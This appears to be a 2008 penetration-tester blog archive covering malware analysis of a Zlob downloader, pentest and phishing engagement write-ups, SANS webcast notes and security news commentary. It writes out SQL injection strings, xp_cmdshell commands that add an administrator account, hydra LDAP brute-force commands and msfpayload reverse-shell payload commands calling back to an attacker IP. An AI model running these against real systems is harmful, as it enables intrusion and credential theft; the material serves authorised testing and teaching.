Maltego Malware Domain List Transforms

Not much hype about the release but the Paterva crew has introduced some really useful transforms for Maltego that utilize Malware Domains List's database.

"We've created a transform application server for integration with the MalwareDomainList.com DB. If you want to see how it works you can download the Community Edition of Maltego (if you don't have it already) from http://www.paterva.com/maltego/.

Once you have it running you should go to Tools -> Manage transforms and click on Discover Transforms.
You can now add a new discovery server with name "MALTAS" and URL http://ctas.paterva.com/MALTAS.xml"

http://www.malwaredomainlist.com/forums/index.php?topic=1938.0

Screenshot!

Pretty handy when all you have is a possible bad IP and want to see if they are already on the "bad boy" list. Being able to see the URL serving up the malware is handy too so you can grab it for analysis.

Thoughts on why we need exploit code and hacker tools

Dean made a comment in the SILC channel about a student who:

"student thinks its terrible to release tools, exploits, etc...he says it makes it too easy for people to attack America"

Its not the first time I've heard that argument, but after a few weeks in the new gig I have newfound understanding for the need to provide "absolute proof" of exploitation or the ability to exploit something.

So while on one hand I understand that exploit code and tools allows bad guys to do what they do on the other hand you have people that require you as their security person to show them with absolute certainty something happened or something could happen. Otherwise there is no "proof." And if I need to show proof to get a problem fixed, mitigated or policy changed or put in place its nice to have the ability to do that.

Thoughts?

Multiple Thoughts on Multiple Security Issues

I'm too tired to put enough effort into several blog posts even though I really want to but next week is already looking painful so I'm going tho throw several different thoughts into this post.

First Thought: The CISSP CBK aint so bad...

After spending the last week explaining what I consider core security ideals to people that should know better, I found myself really feeling that a senior security person should understand those core ideals as a minimum level of competency. To be a keyboard guy, my opinion stands that CISSP not a measure of their ability, but I would expect a "hands-on" guy to know that material as well.

The latest TaoSecurity post mentions NIST 800-27 Engineering Principles for Information Technology Security (A Baseline for Achieving Security) maybe I'll start recommending that.

Second Thought: What should a CxO know?

I'm new to the whole CxO thing, but shouldn't your CIO/CTO/CISO jobs understand the things from the first thought? I am thinking yes, they should have more than a PMP to make smart security decisions but I'd like some feedback on that. Like I said I'm new to that kind of environment. Alot of the people on the SBN that hold those positions seem to understand those concepts.

Third Thought: How do you fix a "porous" network?

By porous I mean more than one security hole at any one time and usually a LARGE security hole. Back to the first thought people seem to think if you can fix one problem the rest magically put themselves on hold while you fix that one and you can "catch up"...not! I am also new to real Incident Handling and Response (in the past I've been the guy getting to cause all the trouble) but I'm finding more and more holes and issues as we try to mitigate and fix the first issue. How do you make people understand that the problems dont stop coming in if you have poor network security or poor network design.

Fourth Thought: Initial feeling on SIMs

My initial take on Security Information Management devices are that they are great concepts. I'm starting to play with Cisco MARS and thus far I am impressed on what it SHOULD be able to do. I'll let you know later how well it does.

Fifth Thought: Another unauthenticated full remote MS exploit...SCORE!

I love bugs that are on the level of MS03-026, MS04-011, and MS06-040. Mass pwnage on pentests is awesome. I hope this new MS08-067 ends up being that bad (and the msf module comes out at some point). We need a new DCOM or LSASS exploit. I love it when we get proof that network security isnt dead.

Last Thought: Really more of a "what would you do/recommend"

In our fictional example you found pwdump on your Domain Controller (not put there by one of your admins) and the registry keys point heavily that its been run successfully and results have downloaded. What do you or recommend to the customer?

The book/draconian answer is wipe everything and start over. In people's experience is that a real option for a real network without the ability for mass downtime? Is a mass password reset considered enough of a mitigation?

Would appreciate input from the people out there on our fictional scenario.

Malware targeting industrial control software(?)

So this morning I was doing my usual malware roundup and looking for anything new or vaguely interesting. Lots of the usual sites all serving the same thing. The pdf exploit (I've a special fondness for this one, see the pentesting failures post), the snapshot_viewer_activex exploit, ms08_053, realplayer11, ms08_011, ms06_014 and a few others. All pretty popular right now.

Then I saw a site that has been floating around serving up malware for a while now. It's been up for about a year I think. It's always had a nice index.htm page with a list of iframes serving up all of the above and some others. I generally have a quick look every now and again and find it's always the same stuff. Lots of reuse of exploits, etc...

Today was a surprise as I found something 'new'. The page has another exploit added. Nothing new about that but it's what the exploit is for that is surprising.

hxxp://www.wackystone.com/counter/IConics.htm

In August a stack overflow exploit in the Iconics Vessel ActiveX control was released. The exploit is in the dlgwrapper.dll [Dialog Wrapper Module ActiveX control]. Tebo and kf wrote a Metasploit exploit module for it. [http://www.milw0rm.com/exploits/6570].

Iconics makes plant automation software for various industries including oil, gas, pharma, airports, etc... SCADA anyone?

A quick decode of the ucs2 encoded payload reveals:

hxxp://www.wackystone.com/counter/taskmgr.exe

The exploit downloads taskmgr.exe, a dropper that installs a second stage piece of malware. I've not downloaded that as yet so I don't know the actual payload or it's function.

I guess what is interesting to me is that the malware authors have decided to use an exploit that has a somewhat small target audience. I could be wrong as I'm not that familiar with those industries and perhaps the software is really widespread.

/dean

ChicagoCon Fall 2008

As usual Don has a great lineup for ChicagoCon 2008f.

http://www.chicagocon.com/content/view/103/51/

ChicagoCon, a bi-annual security event held in the Windy City, features an Ethical Hacking Conference for two days of cutting-edge talks, peer networking and career advancement in the exciting and growing field of computer security for only $100. Microsoft penetration testers AKA ethical hackers, Billy Rios and John Walton headline an impressive list of presentations by researchers, practitioners and executives on Oct 31 and Nov 1, 2008.

ChicagoCon 2008f: White Hats Come Together in Defense of the Digital Frontier

October 27 – November 2, 2008

www.chicagocon.com

The (f)all edition of this bi-annual security event features 12 boot camps (M-F), exams on-site followed by a 2-Day Ethical Hacking Conference (Fri – Sat) featuring Microsoft Hackers AKA Blue Hats Billy Rios and John Walton along with many other speakers and activities.

Con Only Tickets available for just $100.

Courses: CISSP, CISA, CEH, CHFI, ECSA, CWNA, Advanced Technical Hacking (Pen Testing, Web Apps and Reverse Engineering), Cisco CCENT/CCNA, Microsoft ISA Server and a combined CompTIA Network+/Security+ class. Novice, ultimate techie, CISO chair... everyone interested in a security career will find something at ChicagoCon.

Keynotes: Ed Skoudis (SANS, Intelguardians), Gregory Conti (West Point, Author "Security Data Visualization") and Daniel V. Hoffman (CTO SMobile Systems, EH-Net Columnist). Presented by www.ethicalhacker.net.

A list of the speakers is available here:
http://www.chicagocon.com/content/view/103/51/

From Virus Alert to Pwnage Part 2

Some analysis on 2.exe.

2.exe : Not detected by Sandbox (Signature: NO_VIRUS)


[ DetectionInfo ]
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS
* Compressed: YES
* TLS hooks: NO
* Executable type: Application
* Executable file structure: OK
* Filetype: PE_I386

[ General information ]
* Decompressing UPX3.
* File length: 2560 bytes.
* MD5 hash: c6e1de2f6ecae93c09c6bae78d8edcbf.

[ Changes to registry ]
* Creates key "HKCU\Software\Microsoft\Sound".



AhnLab-V3 2008.10.15.0 2008.10.14 -
AntiVir 7.8.1.34 2008.10.14 -
Authentium 5.1.0.4 2008.10.14 -
Avast 4.8.1248.0 2008.10.15 -
AVG 8.0.0.161 2008.10.15 -
BitDefender 7.2 2008.10.15 Trojan.Zlob.1.Gen
CAT-QuickHeal 9.50 2008.10.14 -
ClamAV 0.93.1 2008.10.15 -
DrWeb 4.44.0.09170 2008.10.15 -
eSafe 7.0.17.0 2008.10.12 Suspicious File
eTrust-Vet 31.6.6148 2008.10.14 -
Ewido 4.0 2008.10.14 -
F-Prot 4.4.4.56 2008.10.14 -
F-Secure 8.0.14332.0 2008.10.15
Trojan-Downloader.Win32.Zlob.ajl
Fortinet 3.113.0.0 2008.10.14 -
GData 19 2008.10.15 Trojan.Zlob.1.Gen
Ikarus T3.1.1.34.0 2008.10.15 -
K7AntiVirus 7.10.493 2008.10.14 -
Kaspersky 7.0.0.125 2008.10.15
Trojan-Downloader.Win32.Zlob.ajl
McAfee 5405 2008.10.14 -
Microsoft 1.4005 2008.10.15 -
NOD32 3522 2008.10.14 -
Norman 5.80.02 2008.10.14 -
Panda 9.0.0.4 2008.10.14 Suspicious file
PCTools 4.4.2.0 2008.10.14 -
Prevx1 V2 2008.10.15 Malicious Software
Rising 20.66.12.00 2008.10.14 -
SecureWeb-Gateway 6.7.6 2008.10.15 -
Sophos 4.34.0 2008.10.15 Sus/Behav-1005
Sunbelt 3.1.1722.1 2008.10.14 -
Symantec 10 2008.10.15 Downloader
TheHacker 6.3.1.0.112 2008.10.15 -
TrendMicro 8.700.0.1004 2008.10.14 PAK_Generic.001
VBA32 3.12.8.6 2008.10.14 -
ViRobot 2008.10.14.1419 2008.10.14 -
VirusBuster 4.5.11.0 2008.10.14 -
Additional information
File size: 2560 bytes
MD5...: c6e1de2f6ecae93c09c6bae78d8edcbf
SHA1..: 1b1d7916206583a57e54fe82ebe05a8fb55b25d5
SHA256: 68350cc81af2e867eecea64f1cc83e34ff8c19ad22b8c077529380cdadeaa658
SHA512: 512fd40e91bd47c1e6f1a0e202457cc5fe31ed90a2555f9af8a54796663b3c7a
308729d606a409ef8484edf9bf4b4a1310db8cba61b941b380f6d2ee09e3c694
PEiD..: -
TrID..: File type identification
UPX compressed Win32 Executable (39.5%)
Win32 EXE Yoda's Crypter (34.3%)
Win32 Executable Generic (11.0%)
Win32 Dynamic Link Library (generic) (9.8%)
Generic Win/DOS Executable (2.5%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x4041c0
timedatestamp.....: 0x48eeb35b (Fri Oct 10 01:43:55 2008)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x3000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x4000 0x1000 0x400 6.22 ad30fe5c04339024e6b3344e72484898
UPX2 0x5000 0x1000 0x200 2.06 ebb1b5a9cd4ce06c69ef5ac4d3d7b72b

( 2 imports )
KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc,
VirtualFree, ExitProcess
ADVAPI32.dll: RegCloseKey

( 0 exports )
Prevx info:
http://info.prevx.com/aboutprogramtext.asp?PX5=54E3AAE0008B14250A3900BD90B69
A00B79BCD14
packers (Kaspersky): PE_Patch.UPX, UPX
packers (F-Prot): UPX


Filename c:\2.exe
Filesize 2560 bytes
MD5 c6e1de2f6ecae93c09c6bae78d8edcbf
DLL-Handling
Loaded DLLs
C:\WINDOWS\system32\ntdll.dll
C:\WINDOWS\system32\kernel32.dll
C:\WINDOWS\system32\ADVAPI32.dll
C:\WINDOWS\system32\RPCRT4.dll
C:\WINDOWS\system32\Secur32.dll
C:\WINDOWS\system32\user32.dll
C:\WINDOWS\system32\GDI32.dll
C:\WINDOWS\system32\oleaut32.dll
C:\WINDOWS\system32\msvcrt.dll
C:\WINDOWS\system32\ole32.dll
C:\WINDOWS\system32\IMM32.DLL
C:\WINDOWS\system32\pstorec.dll
C:\WINDOWS\system32\ATL.DLL
Registry
Process Management Creates Process - Filename () CommandLine:
(C:\Program Files\Internet Explorer\iexplore.exe

http://94.75.221.68/stuff/border8.gif) As User: () Creation Flags: ()

--------

Found a norton report based on the IP

https://safeweb.norton.com/report/show?url=94.75.221.68&x=0&y=0

Severity: High

3 instances found. Here is a sample:

Downloader
Location: http://94.75.221.68/stuff/border10.gif
Downloader
Location: http://94.75.221.68/stuff/border8.gif
Downloader
Location: http://94.75.221.68/stuff/border9.gif

----------
**show tcpstream from running the 2.exe in a VM

GET /stuff/border9.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 94.75.221.68
Connection: Keep-Alive

HTTP/1.1 404 Not Found
Server: nginx/0.5.20
Date: Wed, 15 Oct 2008 20:27:23 GMT
Content-Type: text/html
Content-Length: 529
Connection: close


html
head title 404 Not Found /title /head
body bgcolor="white"
center h1 404 Not Found /h1 /center
hr center nginx/0.5.20 /center
/body
/html
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --

**I removed the brackets because blogspot kept rendering the html :-(

Webapp Asssessments Rule or 'why running as 'dbo' is bad!

I just finished up a web application assessment for a client as part of an audit. All I can say is that I've not had that much fun on a web app pentest in ages!

All I was provided with was an ip address. Total blackbox testing. This usually sucks because if you can't get by the login screen, telling the client that, well, the design sucks does not go down well. I like to bring at least a little value.

I had a quick look at the login page and bamn! Full admin access. Yep, 'or 1=1-- lives on. No encoding or filters to bypass at all. As usual the first user in the database was Admin too. After adding another admin user and browsing through the site it was time to see what the database contained. Turns out all the error pages were generic pages as detailed error messages had been disabled. Blind SQLi on .aspx pages sucks. I though this was going to go from quick pwnage to a long ordeal to get the data. Enter Pragmatk. Prag is a friend of mine that just rocks at webapp stuff. We sat down and after visting all the pages and forms that accepted user input we actually found one that returned database error messages. W00t! Let the games begin!

In short order we had everything from the database. Users, passwords, clients, contracts and more. I was able to use the email addresses and passwords we found to log into the user's email account via Outlook Web Access. Perfect. Being greedy we wanted to get access to the server itself. We could create temporary tables and write data to them from any file on the server but this was not enough though. Local admin or fail! Turns out that RDP over 3389 was enabled! Don't ask because I have no idea why. So after trying some of the users and passwords and not getting anywhere I decided to see who the database was running as.

'; if user ='dbo' waitfor delay '0:0:5 '--

Hell yes! Running as Admin. I should have expected it after what we had already found. So next step was to see what I could leverage with this knowledge. In SQL2005 xp_cmdshell is disabled by default but if you have admin access it's really trivial to reenable this stored proceedure. [insert evil grin here]. Using sp_configure it took a few SQL queries to enable xp_cmdshell. A quick test to see if it succeeded.

exec master..xp_cmdshell 'ipconfig > test.txt';CREATE TABLE zeroday (txt varchar(8000)); BULK INSERT zeroday FROM 'C:\\windows\\system32\\test.txt'--

A quick read of the table and w00t!, our ipconfig data was there. Sweet. At this point I'd had too much coffee and started to overthink the next steps. I started going all old skool and writing to a ftp.txt file to pull down my backdoor.exe and execute it. Well at least I did not decide to go the debug.exe route. :) Halfway through I'm talking to Eric over the phone when he 'politely' reminds me that I have RDP access. Just add a user to local admin group and you're golden.

exec master..xp_cmdshell 'NET USER zeroday xxxxxxxx /add'--
exec master..xp_cmdshell 'NET LOCALGROUP "Administrators""zeroday"/add'--

Let's try RDP. It's such a good feeling to see that server's desktop appear! At this point I grabbed the password hashes from the server (not that I'm going to bother cracking them), uploaded my scanner, scanned the two subnets I had access to, got some screenshots and...wtf! DO NOT! I repeat DO NOT run your exchange server on the same server as your webserver!

To finish up Pragmatk took a few minutes to find a persistant XSS in the site (there's more than one). He modified the username field to contain the XSS. If we really wanted we could have modifed each users profile to contain the XSS instead of only our test user. An invisible iframe and I'd have my backdoor dropped to their system in a heartbeat.

All in all a lot of fun was had all round. Cheers to Eric and Pragmatk who rocked as always.

Cheers,
/dean

A Successful Pentest with some Failures.

I'm busy preparing for a [de]briefing following a pentest that Eric and I completed a few weeks ago and was thinking about some of the challenges we faced on this particular engagement. Overall the engagement was VERY successful. We owned the client's infrastructure pretty much completely. This post is not so much about where we succeeded as it's about where we failed or could have improved our processes.

The one element that made this engagement different from most was the limited [really limited!] amount of time we had to complete all aspects of the engagement. 50 hours! This might seem a reasonable amount of time but when you consider that this included the remote, local [internal], phishing and reporting, it's a truly limited amount of time.

After finally getting all the contracts and authorization AKA 'Cover Your Ass' agreements signed we were finally able to proceed with the actual work. The scope itself placed some severe limitations on us but at the same time was very broad in what areas we could target. A contradiction I know. The scope, aside from limiting the amount of active time we had to do the work, as limited us to specific days for when we could actually perform any testing. The remote portion started on a friday night and the internal portion could begin on the Saturday and had a hard stop for both of 8pm on Sunday night.

This while not ideal did provide us with time to do the work. The remote portion of the engagement went pretty fast. The client had a reasonably small internet footprint and numerous sites and devices were out of scope. The internal portion though started off badly with the scope changing drastically. I HATE scope creep!

It turns out that the client was undergoing a large infrastructure and server migration. The address ranges we were provided were now invalid. No problem right? Just get the two new /24 ranges. But noooo, the client had changed the entire subnetting scheme and now we had servers accross about 6 or so subnets. Our scanning and fingerprinting time just increased one hullava a lot. Trying to explain to the client that this was now out of scope was like getting blood from a stone. Rather than posponing the pentest for an indefinite amount of time while waiting for another window to perform the work we decided to focus on only specific subnets and locations, again limiting the scope. Even so one of the things that became obvious was that rather than having the time to scan, enumerate and fingerprint the network and get a solid picture of how it operates and devices interact, I would have to be looking at potential ingress points while the scanning was going on. Not ideal but doable.

One thing I realized is that I'm going to need to keep more than one cheat sheet of scanning arguments for this type of situation in the future. By limiting your scan time you limit what can scan for and rather than taking scan results and reviewing them and then targeting and focusing on a single host, you need to decide on which hosts have the potential for greatest success and leave the others aside. This means you will miss things that may impact the success of the engagement.

Anyway, after enumerating workstations and servers via SMB and DCERPC scans I had an initial list of targets I wanted to focus on. While all this was going on I was also looking for a lot of the usual misconfigurations on the network such as unauthorized shares, default smtp community strings, insecure printers, workstations running the server service, etc... I found them all btw. ;)
So after bypassing the proxy, exfiltrating some data, and getting access to the SAN I needed to focus on the servers and workstations. What I realised was that I needed to better script some of the things I normally do. Running nessus from the command line is great. It's easy to script and cycle through some specific addys. I also realized I needed a few more specific custom scans that looked for a few specific vulnerabilities that I might leverage.

I did end up getting direct access on about 3 or 4 servers through various means. Being very focused as to what I was looking for and basing those searches on my initial analysis of their enviroment paid off. Luckily. It could have gone the other way and that would have, well, sucked. I managed to leverage some of those servers to get a little deeper into the network as well. The limitation on time meant that I could not use those boxes to pivot much deeper into the network. I simply checked for dual homed servers and scanned those subnets. The report covered the potential for further exploitation and access. Thankfully I'd already written scripts that when run would upload my scan utility, run it based on the ipconfig data and download the results to my host.

Another issue was that because this took place over the weekend the office was dead quiet. This meant no port level security, etc... This always makes man in the middle attacks pretty trivial and a great way to spoof dns, steal tokens, passwords, intercept RDP sessions, etc... Well with no traffic that sucked. The VoIP network segment was a little easier as we could create the voice traffic ourselves. That's always fun when you can intercept and replay the voice traffic.

The big issue with the internal portion, aside from managing changes in the scope, was that with limited time you really needed to know what your ultimate target was and to be able to make a decision on the path to take to achieve that goal. Do you target the servers directly? Do you go in via a workstation or do you attack the channels between these devices?

Obviously there are other routes to take but the point is that you need to be sure your direction is the right one or be able to change vectors quickly once you realise that the vector you're using is not working.

The phising portion of the engagement, while incredibly successful, also highlighted the issue of limited time while trying to gain as much information as possible. I've developed a series of scripts that I use in my phishing attacks to harvest, format and send emails, serve up webpages with code to drop a file, steal credentials and gather user information [both automatically and by enticing the user to enter credentials]. These scripts have served me well even though they need to be customized for the current client.

We made the decision that we would not have time to leverage any access we gained from the phish and so we wanted to gather as much data as possible from the target host before moving on to the next one. I have a series of scripts that will gather local data such as users, groups, domain, routes, browser history, etc, etc... I also have a script that takes screenshots of the remote host and downloads them to my system. [I love this script!] All the scripts work very well and save me a lot of time but one of the things I realized was that a phish can be too successful. :)

We had so many shells come through, that even with splitting them between Eric and myself we still missed some and were not able to gather all the data from everyone the way we wanted. I'm putting together a script that will call most of the other scripts when it runs so that I can run it once, gather the data and move on. Our current process is far more efficient than manually gathering that data but it still takes more time that I like in situations like this.

The ability to revise the payload mid phish was also something we had to do and, while we manged, it could have been done far more effeciently. I should have prepared the alternate payloads beforehand to account for this eventuality. Changing the payload on the webserver was as simple as replacing the existing on and modifying the headers in the page. The email was a little more difficult though. I needed to stop the existing smtp script, modify the paylaod and restart it with only the remaining emials being targeted. I then needed to regenerate a new phish email, containing the new payload and a new message, to entice the users that were already targeted. All this while trying to handle the existing shells. While it only takes one user to click on the link or attachment to be successful, this phish was about gathering as much data from as many users as possible.

I don't think our phish would have been half as successful if it had not been for mc and his ninja-like skills in modifying a pdf exploit to run as a Metasploit module, allowing us to use all the payloads in the framework. Awesome stuff.

Our ability to handle multiple payloads connecting back to our servers could also be improved. I actually lost about 5 shells because I could not establish a new session fast enough. Also, rather than having to run a script manually on the target it would be more effecient to have the payload execute a series of commands when it is executed without requiring any interaction at all.
When all was said and done the pentest was actually very successful and we achived all our goals, even with the hiccups we had along the way. It's always a good feeling when an engagement goes well, especially in an environment like this one.

It's important to review the processes and methods you use during an engagement regularily to see if they can be improved or made more effecient. Small things can make a huge difference to the success of a project.

Cheers,
/dean

For a dose of the obvious...

From: http://www.nextgov.com/nextgov/ng_20081015_7578.php?zone=NGpopular

"The FBI's newly appointed chief of cybersecurity warned today that "a couple dozen" countries are eager to hack U.S. government, corporate and military networks...

Henry said certain countries have mounted aggressive campaigns to attack U.S. Internet assets like the .gov, .mil and .com Web domains. Some are interested in sensitive research and development data, while others, like terrorist organizations, see the value in stealing and selling sensitive data to fund physical attacks."

duh! 2001 called to say told you so.

From Virus Alert to Pwnage Part 1

The first week of your new job is normally for finding your desk, getting email set up, finding the best place to grab coffee and snacks. We'll not for me!

What started Tuesday morning as simple virus outbreak on one of the networks we monitor after some initial IR turned into full domain pwnage :-(

The initial virus alert looked something like this:

Alert: Virus Found
Computer:
Date:
Time: 1:34:59 AM
Severity: Critical
Source: Symantec AntiVirus Corporate Edition
File Path:C:\WINDOWS\system32\2.exe
User:
Virus Name:Downloader

A quick question for anyone reading is what kind of privileges are required to write to the system32 folder? The answer should be you first clue to the scope of the problem.

We jumped in on one of the boxes that came up with the virus alert to see what we could find.

A quick review of the task manager listed 6 or 7 iexplore.exe process running by a user that wasn't logged into the host. A quick net user "thatuser" /domain let us know that the user was a member of the domain admins group...oops. We did do a quick call to confirm that the real user hadn't logged into that box.

The iexplore.exe process was connected to an IP that resolved to Amsterdam pulling down a "banner8.gif and banner9.gif". Thus far we haven't located any copies of banner8.gif and banner9.gif on the network and the IP isn't serving them up right now (404). We've asked for FW logs to see if any hosts actually got a 200 for for the file(s).

I'll post what (most dean) came up with for analysis of 2.exe in a separate post.

Lastly, they had a Cisco CSA agent running (in test mode) on one of the hosts that was infected in test mode. The logs of the agent had an alert of psexec executing 2.exe with the domain admins user creds...oops. The good news (for the CSA deployment) was that it would have been blocked had CSA been in enforcement mode. Bad news was that it wasn't.

We also had the domain profile of the unfortunate user show up on all the infected boxes. I'm guessing its a result of the psexec command, but if anyone has any insight on that I'd appreciate a comment.

Any comments on the situation. At this point, what would you do?

More to follow...

Sex Offender Registry Law = FAIL

more adventures of non-technicians making technical policy FTW!

"Registered sex offenders will have to start providing their e-mail addresses to a national database available to social networking sites, under the misleadingly titled "Keeping the Internet Devoid of Sexual Predators Act of 2008" — a bill authored by Senator John McCain and signed by President Bush on Monday.

The idea behind the law (.pdf) is that a social networking site can query the database to keep registered sex offenders from signing up, and thus prevent them from preying on underage users. Needless to say, the law does nothing to stop first-time predators. But it's doubtful that even recidivists will be affected. Pedophiles looking to victimize children — a felony worth years, even decades, in prison — won't be afraid to violate this new law by using an unregistered Gmail address. And now law enforcement will have to struggle to discern whether an offender is using a disposable webmail account to commit new crimes, or just to shunt the blacklist and network with their adult friends and family."

http://blog.wired.com/27bstroke6/2008/10/mccains-sex-off.html

(edit) making laws that are not enforceable or are easily bypassed are a waste of time and money just like regulations that can be followed or enforced. Once we all have a john.smith@person.usa email address AND we all had to use it this might be a law worthy of some effort put into it.

I don't normally say this...

But go feds!

http://blog.wired.com/27bstroke6/2008/10/darkmarket-post.html

"DarkMarket.ws, an online watering hole for thousands of identify thieves, hackers and credit card swindlers, has been secretly run by an FBI cybercrime agent for the last two years, until its voluntary shutdown earlier this month, according to documents unearthed by a German radio network."

OWASP APPSEC 2008 Conference Videos Online

OWASP APPSEC 2008 Conference Videos are online

http://www.owasp.tv

Notes from SANS Penetration Testing with Confidence Webcast

SANS Webcast
https://www.sans.org/webcasts/show.php?webcastid=91101

Penetration Testing with Confidence: 10 Keys to Success

Lenny Zeltser

-(slide 3) sometimes the role of the attacker is tricky for a defender
-(slide 5) Asking the right questions about the pentest is essential to success.
**Less about a step by step and more about asking the right questions to get the right pen test for the customer


Question #1
-Is a pen test the type of assessment that is needed?
**Do you need to demonstrate the vulnerability, do you need to exploit it or is finding the vulnerability enough?

*Types of Assessments
-Vulnerability Assessment
-Security Policy Assessment
-Penetration Test

Question #2
-What is the scope?

*if its a pen test, is the customer actually ready to have their network or application exploited
*possibility of system crashes and failures due to failed exploitation attempts
*pen tests are good for shock value, prove that someone can get in and access information

*Scope Questions

-Targets=which specific systems or networks?
-Depth=how far into the network can we go? need to work that out before you start.
-Exclusions=self explanatory
**excluded systems are usually the most jacked up :-)

Question #3
-What tests should be performed?

*Commonly excluded tests ;-(
**mostly because they are so effective
-Denial of Service
-Physical Security
-Social Engineering
*but if its allowed, try to test specific cases that would be violations of policy or training, will people click on links in emails even though the user training says not to
-War Dialing
-Client-side Attacks


Question #4
-Are non-commercial tools allowed?
**Canvas, Core Impact, MSF, standalone exploits, BT are not necessarily "vetted" and you may need to get permission to use them

Question #5
-What is the attacker's profile

*Professional versus amateur
-Target a network for information and money
-Non-targeted attack, attack of opportunity
*knowing what type of attacker will drive the types of tests you do

Question #6
-Is it a White Box or Black Box test?

-White=full knowledge
-Black=no knowledge minus left & right limits
*depending on the test drives the Path of least resistance and attack trees
-Try to strategize before hand, check out slides 19-22, consider making attack trees

Question #7
-What are the time constraints?

-Duration of the test
-Timing restrictions

Question #8
-How to handle issues that may arise during the test?

-Target system crashed
-Sensitive data found
-You're not the first person on the box...eeeeek
*have a contact form for issues that come up

Question #9
-What do you do with the results?

Question #10
-Do I have explicit permission to perform the pen test

-Written permission...CYA

Notes from SANS Beyond Front-Line Exploits Webcast

Webcast http://www.sans.org/webcasts/show.php?webcastid=91586

Beyond Front-Line Exploits:
Tips and Tools for Comprehensive Penetration Testing

Lenny Zeltser August 2008

#1 Data in plain sight:

-(slide 6/7) site:example.com filetype:pdf
-(slide 8/9)Libextractor for extracting metadata
-(slide 10) Metagoofil
-(slide 11/12)maltego

#2: Remote Password-Guessing

-If you dont find possible usernames using the info in Data In Plain Sight, you can generate your own using
US Census to generate Top Last Names, Top Female First Names, Top Male First Names
http://www.census.gov/genealogy/names/names_files.html

*you'll have to figure out the naming convention for the company your auditing

**my note: have your top 40 username/pass I also have one for mssql passwords, at least you can do a "low hanging fruit" type check besides checking for null passwod

-(slide 15)theharvester for email gathering -use google, linkedin, pgp
-(slide 16) see if webpage gives you a clue if your username/pass is wrong username or wrong password based on error messages in the app
-(slide 17) validate usernames using brutus if the app return useful error messages
-(slide 18/19) create a list of good usernames and a short list of passwords that are worth trying "remote password guessing" writeup on ISC
-(slide 20) Accent Keyword Extractor, keywords that could be passwords for people in the company
-(slide 21) is the password recovery mechanism a weak link? ask you for secret question and display new password, can you use the app to find valid usernames? where if i enter in the wrong username it says i dont know who you are, where if i enter in a correct username a i get a secret question prompt
-(slide 24) if ldap exposed or queriable -- Ldap bruteforce with hydra $ hydra -L users.txt –P passwords.txt ldap.example.com ldap2 or $ k0ld –f users.txt -w passwords.txt -I -o out.txt -f 'cn=*' -h ldap.example.com k0ld is supposedly written specificicaly for ldap
-(slide 25) tsgrinder -- need old version or RDP client for tsgrinder to work, need version 5
** tut by me http://www.ethicalhacker.net/content/view/106/24/
** default 2k3 password complexity with shut this tool down without a good dictionary

#3: Social engineering
**just ask for what you need!
-(slide 29) email phish example for password reset
-(slide 30) ArGoSoft Mail Server Freeware allows you to relaymail locally
-(slide 31) register a similar domain name as your target, use domaintools.com to check for you. http://www.domaintools.com/domain-typo
-(slide 32) just present an error message after the user inputs creds to
-(slide 33) php backend and plugins to grab important data
USER: jsmith
PASSWORD: plumlips
LOCAL IP: 192.168.2.144
REMOTE IP: 208.77.188.166
PORT: 61035
USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
PLUGINS: Move Media Player; QuickTime Plug-in 7.4.1;
Mozilla Default Plug-in; RealJukebox NS Plugin;
RealPlayer(tm) G2 LiveConnect-Enabled Plug-In (32-bit);
Shockwave Flash; Java(TM) Platform SE 6 U2;

*current browsers are not allowing to pull local IP easily

#4: Client-Side Backdoors

-(slide 35/36) target those 3rd party client side vulnerabilities -- delivery is still email or web
-(slide 37) just ask user to install the malware
-(slide 38/39) reverse shell out to attacker, or use msfpayload, he used VNCreverse
$ msfpayload windows/vncinject/reverse_tcp LPORT=5544
LHOST=192.168.1.124 DisableCourtesyShell=True X >
update2.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/vncinject/reverse_tcp
Length: 177
Options: LHOST=192.168.1.124,LPORT=5544,
DisableCourtesyShell=True

$ msfcli exploit/multi/handler LPORT=5544
PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.124
DisableCourtesyShell=True E

-(slide 43) try to get some new things brought into scope for pentests especialy client sides

-from the questions, mindmap all that info above to organize, freemind is a free version

AMEX = FAIL

saw this today while reseting a password...awesome.



Also looks like I'm not the only one having the problem.
http://lastinfirstout.blogspot.com/2008/10/trivial-account-reset-on-american.html

California RFID Law = FAIL

I've been looking for something good to give the "FAIL" to and here it is:

From Wired Threat Level:

"California followed Washington State's footsteps this week to become the second U.S. state outlawing so-called Radio Frequency Identification Device skimming.

Skimmers can easily pilfer information from non-encrypted RFID tags that are growing commonplace. California's bill was adopted and signed by Gov. Arnold Schwarzenegger this week after a demonstration showed that personal information skimmed from entry-card badges from statehouse workers allowed hackers access to secured areas of government offices.

Still, California's measure (.pdf) and the one Washington State adopted in March, don't mandate any RFID encryption. So the vulnerabilities of the Golden State statehouse's entry system remains."

http://blog.wired.com/27bstroke6/2008/10/rfid-anti-skimm.html

All I can say is wow (or fail). The only people this is going to hurt is the security consultants trying to find and fix insecure RFID applications for customers. Much akin to banning guns so only the bad guys have them. Non-technicians making technical policy FTW!

ToorconX Wrap-Up

Joe and I had the opportunity to teach our 2 day Crash Course In Pentesting workshop at Toorcon X. I felt like the workshop went pretty well and we got some good feedback from the students. Joe has spent that last year really working on web application pentesting and can really break down SQL injection and XSS type assessments and attacks. He had day two of the workshop and I thought it was really good. We even had a custom bookstore web application built for the students to practice SQLI, XSS, and LFI/RFI. I had day one. Frankly I covered too much material and not enough time for the students to actually do anything with the lab images but they did get the hard drives to take that stuff home along with the lab manual for the web application thing and the draft version of the LSO Metasploit Mini-Course.

Here is the breakdown of the seminars.
http://sandiego.toorcon.org/content/section/5/7/

